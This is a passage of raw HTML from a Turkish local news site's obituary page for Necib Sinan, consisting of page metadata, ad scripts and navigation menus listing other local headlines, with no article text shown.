
<!DOCTYPE html> <html lang="tr" class="no-inlinesvgsite-center" itemscope itemtype="http://schema.org/NewsArticle"> <head> <script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script> <script> (adsbygoogle = window.adsbygoogle || []).push({ google_ad_client: "ca-pub-7914883170465839", enable_page_level_ads: true }); </script> <title>Necib Sinan 92 yaşında</title> <meta charset="utf-8"> <!--meta name="viewport" content="width=device-width, initial-scale=1.0"--> <meta name="description" content=""> <meta name="keywords" content="Necib Sinan 92 yaşında"> <meta name="news_keywords" content="Necib Sinan 92 yaşında"> <meta name="author" content="Elbistanın Sesi" /> <meta property="fb:admins" content=""> <meta property="og:site_name" content="Elbistanın Sesi"> <meta property="og:title" content="Necib Sinan 92 yaşında"> <meta property="og:description" content=""> <meta property="og:url" content="http://www.elbistaninsesi.com/vefatlar/necib-sinan-92-yasinda-h68407.html"> <meta property="og:image" content="http://www.elbistaninsesi.com/images/haberler/2020/11/necib_sinan_92_yasinda_h68407_e118e.jpg"> <meta property="og:type" content="article"> <meta http-equiv="refresh" content="3000"> <meta name="twitter:card" content="summary_large_image"> <meta name="og:title" content="Necib Sinan 92 yaşında"> <meta name="twitter:url" content="http://www.elbistaninsesi.com/vefatlar/necib-sinan-92-yasinda-h68407.html"> <meta name="twitter:domain" content="http://www.elbistaninsesi.com/"> <meta name="twitter:site" content="elbistaninsesi"> <meta name="twitter:title" content="Necib Sinan 92 yaşında"> <meta name="twitter:description" content=""> <meta name="twitter:image:src" content="http://www.elbistaninsesi.com/images/haberler/2020/11/necib_sinan_92_yasinda_h68407_e118e.jpg"> <link rel="alternate" href="http://www.elbistaninsesi.com/" hreflang="tr-default" /> <link href="http://www.elbistaninsesi.com/_themes/hs-rush-php/style/compress.css" rel="stylesheet" /> <link href="http://www.elbistaninsesi.com/_themes/hs-rush-php/style/print.css" rel="stylesheet" media="print, handheld"> <link rel="alternate" type="application/rss+xml" title="RSS servisi" href="http://www.elbistaninsesi.com/rss.php" /> <link href="https://fonts.googleapis.com/css?family=Oswald&amp;subset=latin,latin-ext" rel='stylesheet' type='text/css'> <link href="https://fonts.googleapis.com/css?family=PT+Sans:400,700&amp;subset=latin,latin-ext" rel="stylesheet" type="text/css"> <link href="https://fonts.googleapis.com/css?family=Roboto:400,400italic,500,500italic,700&amp;subset=latin,latin-ext" rel='stylesheet' type='text/css'> <link href="https://fonts.googleapis.com/css?family=Roboto+Slab:700&amp;subset=latin,latin-ext" rel="stylesheet" type="text/css"> <link rel="canonical" href=""> <link rel="publisher" href="#" /> <link rel="image_src" type="image/jpeg" href="http://www.elbistaninsesi.com/images/haberler/2020/11/necib_sinan_92_yasinda_h68407_e118e.jpg" /> <meta itemprop="headline" content="Necib Sinan 92 yaşında" /> <meta itemprop="thumbnailUrl" content="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/11/necib_sinan_92_yasinda_h68407_e118e.jpg" /> <meta itemprop="articleSection" content="Vefatlar" name="section" /> <meta itemprop="dateCreated" content="2020-11-19T15:42:00+02:00" /> <meta itemprop="dateModified" content="2020-11-19T15:56:18+02:00" /> <meta itemprop="image" content="http://www.elbistaninsesi.com/images/haberler/2020/11/necib_sinan_92_yasinda_h68407_e118e.jpg" /> <meta itemprop="genre" content="news" name="medium" /> <meta itemprop="inLanguage" content="tr-TR" /> <meta itemprop="keywords" content="Necib Sinan 92 yaşında" name="keywords" /> <!--[if gte IE 9]> <style type="text/css"> .gradient { filter: none; } </style> <![endif]--> <!--[if IE 7]> <style type="text/css"> .reklam.dikey.sol .fixed { margin-left:-px; } </style> <![endif]--> <script type="text/javascript"> var site_url = 'http://www.elbistaninsesi.com/'; var tema = 'hs-rush-php'; var theme_path = 'http://www.elbistaninsesi.com/_themes/hs-rush-php/'; var ajax_url = '_ajax/'; var cat_limit = '10'; var headerayar = 'header_genis'; var poll_voted = ''; var comment_approved = '0'; var doviz = '1'; var lazyload = '0'; var twitter_user = 'elbistaninsesi'; var facebook_user = 'elbistaninsesi'; var popup_saat = '1'; var yorum_harf_ayar = '1'; var hava = '0'; var hava_default = '15888'; var namaz = '1'; var iftara_kalan_sure = '0'; var namaz_default = 'kahramanmaras'; var superlig = '1'; var uye_gir = 'Üye Girişi'; var uye_ol = 'Üye Ol'; var cikis_yap = 'Çıkış Yap'; var baglan_fb = 'Facebook ile Bağlan'; var analitik_ga = 'UA-21655627-1'; </script> <script data-ad-client="pub-3633419220222736" async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script> <!--[if lt IE 9]> <script src="http://html5shim.googlecode.com/svn/trunk/html5.js"></script> <![endif]--> <script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script> <script> (adsbygoogle = window.adsbygoogle || []).push({ google_ad_client: "ca-pub-7533583759274488", enable_page_level_ads: true }); </script> </head> <body> <!-- HEADER --> <div id="siteHeader" class="header fluid row-fluid"> <div id="header-top" class="header-top row-fluid"> <div class="header-top-container"> <div class="header-top-block header-top-cycle"> <div class="header-top-currency"> <div class="currency-cycle"> <div class="currency-dolar glyphicons white usd">DOLAR <span class="currency-rate">7.5785</span></div> <div class="currency-euro glyphicons white euro">EURO <span class="currency-rate">8.9746</span></div> <div class="currency-altin glyphicons white coins">ALTIN <span class="currency-rate">453.888</span></div> <div class="currency-bist glyphicons white global">BIST <span class="currency-rate">1313</span></div> </div> </div> <div class="header-top-hot mleft"> <div class="hot-cycle"> <div> <a class="glyphicons white history rotateIn" href="http://www.elbistaninsesi.com/guncel/kabaagac-ta-kaza-1-i-cocuk-3-yarali-h68415.html" title="Kabaağaç&#039;ta kaza: 1&#039;i çocuk 3 yaralı" >Kabaağaç&#039;ta kaza: 1&#039;i çocuk 3 yaralı</a> </div> <div> <a class="glyphicons white history rotateIn" href="http://www.elbistaninsesi.com/guncel/asik-mahzuni-ses-yarismasinda-final-gecesi-h68413.html" title="Aşık Mahzuni Ses Yarışması’nda Final Gecesi" >Aşık Mahzuni Ses Yarışması’nda Final Gecesi</a> </div> <div> <a class="glyphicons white history rotateIn" href="http://www.elbistaninsesi.com/guncel/baskan-gurbuz-elbistan-bizim-evimiz-slogani-ile-ziyaretlerini-surduruyor-h68412.html" title="Başkan Gürbüz, ‘Elbistan bizim evimiz’ sloganı ile ziyaretlerini sürdürüyor" >Başkan Gürbüz, ‘Elbistan bizim evimiz’ sloganı ile ziyaretlerini...</a> </div> <div> <a class="glyphicons white history rotateIn" href="http://www.elbistaninsesi.com/guncel/isci-servislerine-koronavirus-denetimi-h68411.html" title="İşçi servislerine koronavirüs denetimi" >İşçi servislerine koronavirüs denetimi</a> </div> <div> <a class="glyphicons white history rotateIn" href="http://www.elbistaninsesi.com/guncel/ismail-genc-esnaf-kefalet-kooperatifine-baskan-adayligini-acikladi-h68410.html" title="İsmail Genç, Esnaf Kefalet Kooperatifi’ne başkan adaylığını açıkladı" >İsmail Genç, Esnaf Kefalet Kooperatifi’ne başkan adaylığını açıkladı</a> </div> <div> <a class="glyphicons white history rotateIn" href="http://www.elbistaninsesi.com/guncel/3u-aranan-sahis-olmak-uzere-4-kisi-yakalandi-h68409.html" title="3’ü aranan şahıs olmak üzere 4 kişi yakalandı" >3’ü aranan şahıs olmak üzere 4 kişi yakalandı</a> </div> <div> <a class="glyphicons white history rotateIn" href="http://www.elbistaninsesi.com/guncel/elbistan-belediyesinden-kale-restoran-aciklamasi-h68404.html" title="Elbistan Belediyesi’nden Kale Restoran açıklaması" >Elbistan Belediyesi’nden Kale Restoran açıklaması</a> </div> <div> <a class="glyphicons white history rotateIn" href="http://www.elbistaninsesi.com/guncel/katil-zanlisi-agabey-arazide-saklanirken-yakalandi-h68402.html" title="Katil zanlısı ağabey, arazide saklanırken yakalandı" >Katil zanlısı ağabey, arazide saklanırken yakalandı</a> </div> <div> <a class="glyphicons white history rotateIn" href="http://www.elbistaninsesi.com/guncel/elbistanda-teknik-takipli-tefecilik-sorusturmasi-29-kisiye-islem-yapildi-h68401.html" title="Elbistan’da teknik takipli tefecilik soruşturması: 29 kişiye işlem yapıldı" >Elbistan’da teknik takipli tefecilik soruşturması: 29 kişiye işlem...</a> </div> <div> <a class="glyphicons white history rotateIn" href="http://www.elbistaninsesi.com/guncel/toplu-ulasimda-hes-kodu-eslestirmesi-icin-son-tarih-15-aralik-h68399.html" title="Toplu ulaşımda HES kodu eşleştirmesi için son tarih 15 Aralık" >Toplu ulaşımda HES kodu eşleştirmesi için son tarih 15 Aralık</a> </div> </div> </div> </div> <div class="header-top-block header-top-right"> <div class="header-top-user"> <div class="btn-group"> <button class="btn btn-user dropdown-toggle glyphicons white keys" data-toggle="dropdown"></button> <ul id="memberArea" class="dropdown-menu"> </ul> </div> </div> </div> <div id="sb-search" class="header-top-block header-top-search sb-search"> <form action="http://www.elbistaninsesi.com/" method="get"> <input type="hidden" name="m" value="arama"> <input class="sb-search-input" placeholder="Haber Ara ..." type="search" name="q" id="search"> <input type="hidden" name="auth" value="d1e3d5e85a3fcfbe829477f03881520df6161d6d" /> <input class="sb-search-submit" type="submit" value=""> <span class="sb-icon-search"></span> </form> </div> </div> </div> <div id="logo" class="row-fluid"> <div class="container"> <div class="span3"> <span class="logo"><a href="http://www.elbistaninsesi.com/" class="logo"><img src="http://www.elbistaninsesi.com/images/banner/Ysimsiz-1_2.jpg" alt="Necib Sinan 92 yaşında" /></a></span> </div> </div> </div> <div id="menu" class="row-fluid"> <div class="kategori"> <div class="container"> <a href="http://www.elbistaninsesi.com/" class="darken glyphicons home"></a> <a href="http://www.elbistaninsesi.com/yazarlar.html" class="blue glyphicons group">Yazarlar</a> <a title="Vefatlar" href="http://www.elbistaninsesi.com/vefatlar" id="k7" class="current" >Vefatlar</a> <a title="Güncel" href="http://www.elbistaninsesi.com/guncel" id="k8" >Güncel</a> <a title="Politika" href="http://www.elbistaninsesi.com/politika" id="k2" >Politika</a> <a title="Sağlık" href="http://www.elbistaninsesi.com/saglik" id="k4" >Sağlık</a> <a title="Eğitim / Kültür" href="http://www.elbistaninsesi.com/egitim-kultur" id="k5" >Eğitim / Kültür</a> <a title="Spor" href="http://www.elbistaninsesi.com/spor" id="k1" >Spor</a> <a title="Ekonomi" href="http://www.elbistaninsesi.com/ekonomi" id="k3" >Ekonomi</a> <a title="Arşiv Özel" href="http://www.elbistaninsesi.com/arsiv-ozel" id="k9" >Arşiv Özel</a> <a title="Seçim Sonucu" href="http://www.elbistaninsesi.com/secim-sonucu" id="k13" >Seçim Sonucu</a> <a title="YEREL" href="http://www.elbistaninsesi.com/yerel" id="k17" >YEREL</a> <div class="other pull-right"><a href="#" class="all" title="Diğer Kategoriler">TÜM KATEGORİLER</a></div> <div class="othercat"> <div class="inner"> <div class="clearfix"> <a title="ASAYİŞ" href="http://www.elbistaninsesi.com/asayis" id="k19" >ASAYİŞ</a> <a title="KÜLTÜR-SANAT" href="http://www.elbistaninsesi.com/kultur-sanat" id="k20" >KÜLTÜR-SANAT</a> <a title="GENEL" href="http://www.elbistaninsesi.com/genel" id="k21" >GENEL</a> <a title="DÜNYA" href="http://www.elbistaninsesi.com/dunya" id="k22" >DÜNYA</a> <a title="EĞİTİM" href="http://www.elbistaninsesi.com/egitim" id="k48" >EĞİTİM</a> <a title="ÇEVRE" href="http://www.elbistaninsesi.com/cevre" id="k53" >ÇEVRE</a> <a title="MAGAZİN" href="http://www.elbistaninsesi.com/magazin" id="k60" >MAGAZİN</a> <a title="HABERDE İNSAN" href="http://www.elbistaninsesi.com/haberde-insan" id="k71" >HABERDE İNSAN</a> </div> </div> </div> </div> </div> <div id="katicerik" class="row-fluid"> <div class="container"><div class="katelement kat_k7"> <div class="kathab"><div> <a href="http://www.elbistaninsesi.com/vefatlar/ali-dogan-84-yasinda-h68414.html" title="Ali Doğan 84 yaşında,"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/11/ali_dogan_84_yasinda_h68414_60be3.jpg" alt="Ali Doğan 84 yaşında," /> Ali Doğan 84 yaşında,</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/vefatlar/hasbi-ozdemir-74-yasinda-h68408.html" title="Hasbi Özdemir 74 yaşında"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/11/hasbi_ozdemir_74_yasinda_h68408_922ab.jpg" alt="Hasbi Özdemir 74 yaşında" /> Hasbi Özdemir 74 yaşında</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/vefatlar/necib-sinan-92-yasinda-h68407.html" title="Necib Sinan 92 yaşında"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/11/necib_sinan_92_yasinda_h68407_e118e.jpg" alt="Necib Sinan 92 yaşında" /> Necib Sinan 92 yaşında</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/vefatlar/gunnur-aksoy-46-yasinda-h68406.html" title="Günnur Aksoy 46 yaşında,"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/11/gunnur_aksoy_46_yasinda_h68406_6395e.jpg" alt="Günnur Aksoy 46 yaşında," /> Günnur Aksoy 46 yaşında,</a> </div> </div></div><div class="katelement kat_k8"> <div class="kathab"><div> <a href="http://www.elbistaninsesi.com/guncel/kabaagac-ta-kaza-1-i-cocuk-3-yarali-h68415.html" title="Kabaağaç&#039;ta kaza: 1&#039;i çocuk 3 yaralı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/11/kabagac_ta_kaza_1_i_cocuk_3_yarali_h68415_e01f0.jpg" alt="Kabaağaç&#039;ta kaza: 1&#039;i çocuk 3 yaralı" /> Kabaağaç&#039;ta kaza: 1&#039;i çocuk 3 yaralı</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/guncel/asik-mahzuni-ses-yarismasinda-final-gecesi-h68413.html" title="Aşık Mahzuni Ses Yarışması’nda Final Gecesi"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/11/asik_mahzuni_ses_yarismasinda_final_gecesi_h68413_61af6.jpg" alt="Aşık Mahzuni Ses Yarışması’nda Final Gecesi" /> Aşık Mahzuni Ses Yarışması’nda Final Gecesi</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/guncel/baskan-gurbuz-elbistan-bizim-evimiz-slogani-ile-ziyaretlerini-surduruyor-h68412.html" title="Başkan Gürbüz, ‘Elbistan bizim evimiz’ sloganı ile ziyaretlerini sürdürüyor"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/11/baskan_gurbuz_elbistan_bizim_evimiz_slogani_ile_ziyaretlerini_surduruyor_h68412_84287.jpg" alt="Başkan Gürbüz, ‘Elbistan bizim evimiz’ sloganı ile ziyaretlerini sürdürüyor" /> Başkan Gürbüz, ‘Elbistan bizim evimiz’ sloganı ile ziyaretlerini sürdürüyor</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/guncel/isci-servislerine-koronavirus-denetimi-h68411.html" title="İşçi servislerine koronavirüs denetimi"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/11/isci_servislerine_koronavirus_denetimi_h68411_410b6.jpg" alt="İşçi servislerine koronavirüs denetimi" /> İşçi servislerine koronavirüs denetimi</a> </div> </div></div><div class="katelement kat_k2"> <div class="kathab"><div> <a href="http://www.elbistaninsesi.com/politika/iyi-partide-mevcut-baskan-huseyin-gul-guven-tazeledi-h66989.html" title="İYİ Parti’de mevcut Başkan Hüseyin Gül, güven tazeledi"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/06/iyi_partide_mevcut_baskan_huseyin_gul_guven_tazeledi_h66989_4ef72.JPG" alt="İYİ Parti’de mevcut Başkan Hüseyin Gül, güven tazeledi" /> İYİ Parti’de mevcut Başkan Hüseyin Gül, güven tazeledi</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/politika/ak-parti-ilce-baskan-adayi-tirastan-aciklama-h66803.html" title="AK Parti İlçe Başkan Adayı Tıraş’tan açıklama"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/05/ak_parti_ilce_baskan_adayi_tirastan_aciklama_h66803_4a4d1.jpg" alt="AK Parti İlçe Başkan Adayı Tıraş’tan açıklama" /> AK Parti İlçe Başkan Adayı Tıraş’tan açıklama</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/politika/baskan-sungur-kongrede-yeniden-aday-olmayacagini-acikladi-h65800.html" title="Başkan Sungur kongrede yeniden aday olmayacağını açıkladı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/02/baskan_sungur_kongrede_yeniden_aday_olmayacagini_acikladi_h65800_70585.jpeg" alt="Başkan Sungur kongrede yeniden aday olmayacağını açıkladı" /> Başkan Sungur kongrede yeniden aday olmayacağını açıkladı</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/politika/mhp-meclis-uyelerinden-birlik-ve-beraberlik-iftari-h63165.html" title="MHP Meclis Üyeleri’nden birlik ve beraberlik iftarı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/06/mhp_meclis_uyelerinden_birlik_ve_beraberlik_iftari_h63165_540b4.JPG" alt="MHP Meclis Üyeleri’nden birlik ve beraberlik iftarı" /> MHP Meclis Üyeleri’nden birlik ve beraberlik iftarı</a> </div> </div></div><div class="katelement kat_k4"> <div class="kathab"><div> <a href="http://www.elbistaninsesi.com/saglik/crown-dental-hasta-kabulune-basladi-h63790.html" title="Crown Dental hasta kabulüne başladı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/08/crown_dental_hasta_kabulune_basladi_h63790_f7c46.JPG" alt="Crown Dental hasta kabulüne başladı" /> Crown Dental hasta kabulüne başladı</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/saglik/uzman-dr-erdinc-hatipsoylu-hasta-kabulune-basladi-h63781.html" title="Uzman Dr. Erdinç Hatipsoylu hasta kabulüne başladı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/08/uzman_dr_erdinc_hatipsoylu_hasta_kabulune_basladi_h63781_4e39a.JPG" alt="Uzman Dr. Erdinç Hatipsoylu hasta kabulüne başladı" /> Uzman Dr. Erdinç Hatipsoylu hasta kabulüne başladı</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/saglik/elbistanda-saglik-kadrosu-guclenmeye-devam-ediyor-h63436.html" title="Elbistan’da sağlık kadrosu güçlenmeye devam ediyor"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/06/elbistanda_saglik_kadrosu_guclenmeye_devam_ediyor_h63436_480cd.JPG" alt="Elbistan’da sağlık kadrosu güçlenmeye devam ediyor" /> Elbistan’da sağlık kadrosu güçlenmeye devam ediyor</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/saglik/edh-obezite-cerrahisinde-soz-sahibi-olmaya-basladi-h63423.html" title="EDH, obezite cerrahisinde söz sahibi olmaya başladı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/06/edh_obezite_cerrahisinde_soz_sahibi_olmaya_basladi_h63423_4b617.JPG" alt="EDH, obezite cerrahisinde söz sahibi olmaya başladı" /> EDH, obezite cerrahisinde söz sahibi olmaya başladı</a> </div> </div></div><div class="katelement kat_k5"> <div class="kathab"><div> <a href="http://www.elbistaninsesi.com/egitim-kultur/maras-savunmasi-belgeselinin-elbistan-bolumu-cekiliyor-h63426.html" title="Maraş Savunması Belgeseli’nin Elbistan bölümü çekiliyor"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/06/maras_savunmasi_belgeselinin_elbistan_bolumu_cekiliyor_h63426_dfbd4.JPG" alt="Maraş Savunması Belgeseli’nin Elbistan bölümü çekiliyor" /> Maraş Savunması Belgeseli’nin Elbistan bölümü çekiliyor</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/egitim-kultur/otizmli-cocuklar-icin-ozel-etkinlik-h62473.html" title="Otizmli çocuklar için özel etkinlik"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/04/otizmli_cocuklar_icin_ozel_etkinlik_h62473_6209c.jpg" alt="Otizmli çocuklar için özel etkinlik" /> Otizmli çocuklar için özel etkinlik</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/egitim-kultur/kadinlara-yonelik-elde-maras-isi-el-nakiscisi-kursu-aciliyor-h61759.html" title="Kadınlara yönelik elde Maraş işi-el nakışçısı kursu açılıyor"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/01/kadinlara_yonelik_elde_maras_isi_el_nakiscisi_kursu_aciliyor_h61759_488fe.jpg" alt="Kadınlara yönelik elde Maraş işi-el nakışçısı kursu açılıyor" /> Kadınlara yönelik elde Maraş işi-el nakışçısı kursu açılıyor</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/egitim-kultur/nurhak-kaymakamligindan-egitime-ozel-destek-h61699.html" title="Nurhak Kaymakamlığı’ndan eğitime özel destek"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/no_headline.jpg" alt="Nurhak Kaymakamlığı’ndan eğitime özel destek" /> Nurhak Kaymakamlığı’ndan eğitime özel destek</a> </div> </div></div><div class="katelement kat_k1"> <div class="kathab"><div> <a href="http://www.elbistaninsesi.com/spor/elbistanspor-kadin-voleybol-takimi-ankaradan-puansiz-dondu-h65794.html" title="Elbistanspor Kadın Voleybol Takımı, Ankara’dan puansız döndü"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/02/elbistanspor_kadin_voleybol_takimi_ankaradan_puansiz_dondu_h65794_499a5.jpg" alt="Elbistanspor Kadın Voleybol Takımı, Ankara’dan puansız döndü" /> Elbistanspor Kadın Voleybol Takımı, Ankara’dan puansız döndü</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/spor/filenin-sultanlari-nevsehiri-agirlayacak-h65558.html" title="Filenin sultanları, Nevşehir’i ağırlayacak"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/01/filenin_sultanlari_nevsehiri_agirlayacak_h65558_a6a90.jpg" alt="Filenin sultanları, Nevşehir’i ağırlayacak" /> Filenin sultanları, Nevşehir’i ağırlayacak</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/spor/ptt-sporu-3-1-yenen-filenin-sultanlari-moral-buldu-h65460.html" title="PTT Spor’u 3-1 yenen filenin sultanları moral buldu"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/01/ptt_sporu_3_1_yenen_filenin_sultanlari_moral_buldu_h65460_2da74.jpg" alt="PTT Spor’u 3-1 yenen filenin sultanları moral buldu" /> PTT Spor’u 3-1 yenen filenin sultanları moral buldu</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/spor/elbistan-in-sultanlari-ndan-onemli-galibiyet-h65021.html" title="Elbistan&#039;ın Sultanları&#039;ndan önemli galibiyet"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/12/elbistan_in_sultanlari_dan_onemli_galibiyet_h65021_ff6ef.jpg" alt="Elbistan&#039;ın Sultanları&#039;ndan önemli galibiyet" /> Elbistan&#039;ın Sultanları&#039;ndan önemli galibiyet</a> </div> </div></div><div class="katelement kat_k3"> <div class="kathab"><div> <a href="http://www.elbistaninsesi.com/ekonomi/mikrokredi-destegi-koronavirus-doneminde-de-devam-ediyor-h67098.html" title="Mikrokredi desteği koronavirüs döneminde de devam ediyor"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/07/mikrokredi_destegi_koronavirus_doneminde_de_devam_ediyor_h67098_5fc86.jpg" alt="Mikrokredi desteği koronavirüs döneminde de devam ediyor" /> Mikrokredi desteği koronavirüs döneminde de devam ediyor</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/ekonomi/baris-pinari-harekatinda-teror-orgutune-buyuk-darbe-h64435.html" title="Barış Pınarı Harekatı’nda terör örgütüne büyük darbe"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/10/baris_pinari_harekatinda_teror_orgutune_buyuk_darbe_h64435_aec94.jpg" alt="Barış Pınarı Harekatı’nda terör örgütüne büyük darbe" /> Barış Pınarı Harekatı’nda terör örgütüne büyük darbe</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/ekonomi/etso-ve-teb-kredi-protokolu-imzaladi-h61756.html" title="ETSO ve TEB kredi protokolü imzaladı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/01/etso_ve_teb_kredi_protokolu_imzaladi_h61756_7542a.jpg" alt="ETSO ve TEB kredi protokolü imzaladı" /> ETSO ve TEB kredi protokolü imzaladı</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/ekonomi/dogakadan-ekinozu-ve-nurhaktaki-yatirimlara-destek-h61675.html" title="DOĞAKA’dan Ekinözü ve Nurhak’taki yatırımlara destek"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/01/dogakadan_ekinozu_ve_nurhaktaki_yatirimlara_destek_h61675_c61db.jpg" alt="DOĞAKA’dan Ekinözü ve Nurhak’taki yatırımlara destek" /> DOĞAKA’dan Ekinözü ve Nurhak’taki yatırımlara destek</a> </div> </div></div><div class="katelement kat_k9"> <div class="kathab"><div> <a href="http://www.elbistaninsesi.com/arsiv-ozel/17-ekim-1968-pazartesi-h3006.html" title="17 EKİM 1968 PAZARTESİ"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/24401.jpg" alt="17 EKİM 1968 PAZARTESİ" /> 17 EKİM 1968 PAZARTESİ</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/arsiv-ozel/13-ekim-1968-persembe-h3005.html" title="13 EKİM 1968 PERŞEMBE"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/24398.jpg" alt="13 EKİM 1968 PERŞEMBE" /> 13 EKİM 1968 PERŞEMBE</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/arsiv-ozel/17-agustos-1967-persembe-h2896.html" title="17 AĞUSTOS 1967 PERŞEMBE"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/24181.jpg" alt="17 AĞUSTOS 1967 PERŞEMBE" /> 17 AĞUSTOS 1967 PERŞEMBE</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/arsiv-ozel/30-mayis-1959-cumartesi-h2893.html" title="30 MAYIS 1959 CUMARTESİ"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/24174.jpg" alt="30 MAYIS 1959 CUMARTESİ" /> 30 MAYIS 1959 CUMARTESİ</a> </div> </div></div><div class="katelement kat_k13"> <div class="kathab"><div> <a href="http://www.elbistaninsesi.com/secim-sonucu/16-nisan-2017-anayasa-degisikligi-referandumu-h39059.html" title="16 Nisan 2017 Anayasa Değişikliği Referandumu"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/04/16_nisan_2017_anayasa_degisikligi_referandumu_h39059_39ce8.jpg" alt="16 Nisan 2017 Anayasa Değişikliği Referandumu" /> 16 Nisan 2017 Anayasa Değişikliği Referandumu</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/secim-sonucu/1-kasim-2015-26-donem-milletvekili-genel-secimi-h39058.html" title="1 Kasım 2015 26. Dönem Milletvekili Genel Seçimi"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/04/1_kasim_2015_26_donem_milletvekili_genel_secimi_h39058_aa012.jpg" alt="1 Kasım 2015 26. Dönem Milletvekili Genel Seçimi" /> 1 Kasım 2015 26. Dönem Milletvekili Genel Seçimi</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/secim-sonucu/7-haziran-2015-25-donem-milletvekili-genel-secimi-h30737.html" title="7 Haziran 2015 25. Dönem Milletvekili Genel Seçimi"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2015-Genel-Secim-Sonuclari_297.jpg" alt="7 Haziran 2015 25. Dönem Milletvekili Genel Seçimi" /> 7 Haziran 2015 25. Dönem Milletvekili Genel Seçimi</a> </div> </div><div class="kathab"></div></div><div class="katelement kat_k17"> <div class="kathab"><div> <a href="http://www.elbistaninsesi.com/kahramanmaras/kmtso-baskani-zabun-ktm-tekstil-ve-moda-yolculuguna-yeni-bir-ivme-kazandiracak-h38463.html" title="KMTSO Başkanı Zabun; “KTM, tekstil ve moda yolculuğuna yeni bir ivme kazandıracak”"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/04/kmtso_baskani_zabun_ktm_tekstil_ve_moda_yolculuguna_yeni_bir_ivme_kazandiracak.jpg" alt="KMTSO Başkanı Zabun; “KTM, tekstil ve moda yolculuğuna yeni bir ivme kazandıracak”" /> KMTSO Başkanı Zabun; “KTM, tekstil ve moda yolculuğuna yeni bir ivme kazandıracak”</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/kahramanmaras/minikler-kizilderililerin-sira-disi-dunyasini-kesfedecek-h38435.html" title="Minikler, Kızılderililerin sıra dışı dünyasını keşfedecek"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/no_headline.jpg" alt="Minikler, Kızılderililerin sıra dışı dünyasını keşfedecek" /> Minikler, Kızılderililerin sıra dışı dünyasını keşfedecek</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/kahramanmaras/ogrenciler-hedefi-12den-vurmak-icin-yaristi-h38434.html" title="Öğrenciler hedefi 12’den vurmak için yarıştı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/04/ogrenciler_hedefi_12den_vurmak_icin_yaristi.jpg" alt="Öğrenciler hedefi 12’den vurmak için yarıştı" /> Öğrenciler hedefi 12’den vurmak için yarıştı</a> </div> </div><div 